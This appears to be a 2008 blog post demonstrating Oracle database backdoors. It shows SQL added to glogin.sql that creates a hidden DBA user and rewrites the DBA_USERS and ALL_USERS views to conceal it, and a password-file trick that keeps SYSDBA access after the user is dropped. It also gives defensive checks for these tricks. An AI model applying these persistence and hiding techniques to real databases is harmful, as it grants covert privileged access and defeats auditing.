There’re some SQL command files which will be executed when users logon db, such as glogin.sql/login.sql on SQL*Plus, toad.ini on TOAD. The cracker can modify these files and add some statements to create user, escalate privileges, change data, and so on. Illuminate through the following demo.
Modify glogin.sql file, add the following statements. It has two purposes: create one user with dba privilege; recreate view dba_users & all_users, hide this user through query these views.
set term off
create user cracker identified by cracker;
grant dba to cracker;
CREATE OR REPLACE FORCE VIEW “SYS”.”ALL_USERS” (”NAME”, “USER#”, “CTIME”) AS
… …
and u.name != ‘CRACKER’;
CREATE OR REPLACE FORCE VIEW “SYS”.”DBA_USERS” (”USERNAME”, “USER_ID”, “PASSWORD”, “ACCOUNT_STATUS”, “LOCK_DATE”, “EXPIRY_DATE”, “DEFAULT_TABLESPACE”, “TEMPORARY_TABLESPACE”, “CREATED”, “PROFILE”, “INITIAL_RSRC_CONSUMER_GROUP”, “EXTERNAL_NAME”) AS
… …
and u.name != ‘CRACKER’;
set term on
Then logon db with sys user.
[oracle@chen admin]$ sqlplus
SQL*Plus: Release 9.2.0.4.0 – Production on Thu Jan 10 11:07:06 2008
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Enter user-name: /as sysdba
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 – Production
sys@CHEN>select name from all_users;
NAME
——————————
SYS
SYSTEM
OUTLN
DBSNMP
TEST
YP
6 rows selected.
sys@CHEN>select username from dba_users;
USERNAME
——————————
SYS
SYSTEM
OUTLN
DBSNMP
TEST
YP
6 rows selected.
sys@CHEN>conn cracker/cracker
Connected.
sys@CHEN>select name from sys.user$ where TYPE#<>0 minus select username from dba_users;
NAME
——————————
CRACKER
Recommends
1. Check glogin.sql/login.sql/toad.ini files for modification;
2. Check search sequence SQLPATH;
3. If possible use SQL*Plus <10g because the (g)login.sql is only executed during the firstly login;
4. Use /nolog as SQL*Plus startup parameter, (g)login.sql is not executed with SQL*Plus <10g.
5. Use OS tools to track these files changed, such as md5sum/sha1sum in Linux.
Orapw file issue
sys@CHEN>create user hacker identified by hacker;
User created.
sys@CHEN>grant sysdba to hacker;
Grant succeeded.
[admin@chen ~]$ sqlplus “hacker/hacker@chen as sysdba”
SQL*Plus: Release 9.2.0.8.0 – Production on Tue Mar 4 22:24:22 2008
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 – Production
sys@CHEN>
sys@CHEN>!cp /opt/app/oracle/product/9.2.0/dbs/orapwchen /opt/app/oracle/product/9.2.0/dbs/orapwchen.org
sys@CHEN>drop user hacker;
User dropped.
sys@CHEN>!cp /opt/app/oracle/product/9.2.0/dbs/orapwchen.org /opt/app/oracle/product/9.2.0/dbs/orapwchen
sys@CHEN>select name from user$ where type#<>0;
NAME
——————————
SYS
SYSTEM
OUTLN
DBSNMP
TEST
YP
6 rows selected.
sys@CHEN>select * from v$pwfile_users;
USERNAME SYSDB SYSOP
—————————— —– —–
SYS TRUE TRUE
HACKER TRUE FALSE
sys@CHEN>select VIEW_DEFINITION from v$fixed_view_definition where VIEW_NAME=’GV$PWFILE_USERS’;
VIEW_DEFINITION
——————————————————————————————————————————————————
select inst_id,username,decode(sysdba,1,’TRUE’,’FALSE’), decode(sysoper,1,’TRUE’,’FALSE’) from x$kzsrt where valid=1 and username != ‘INTERNAL’
[admin@chen ~]$ sqlplus “hacker/hacker@chen as sysdba”
SQL*Plus: Release 9.2.0.8.0 – Production on Tue Mar 4 22:27:19 2008
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 – Production
sys@CHEN>
Even though the user HACKER was dropped in the db, it still can logon as SYSDBA if it exists in orapw file. We still can hide the user in gv$pwfile_profiles if change its definition to the following statement which is hard-coded in binary file oracle.
select inst_id,username,decode(sysdba,1,’TRUE’,’FALSE’), decode(sysoper,1,’TRUE’,’FALSE’) from x$kzsrt where username not in (’INTERNAL’,’HACKER’)
Leave a Reply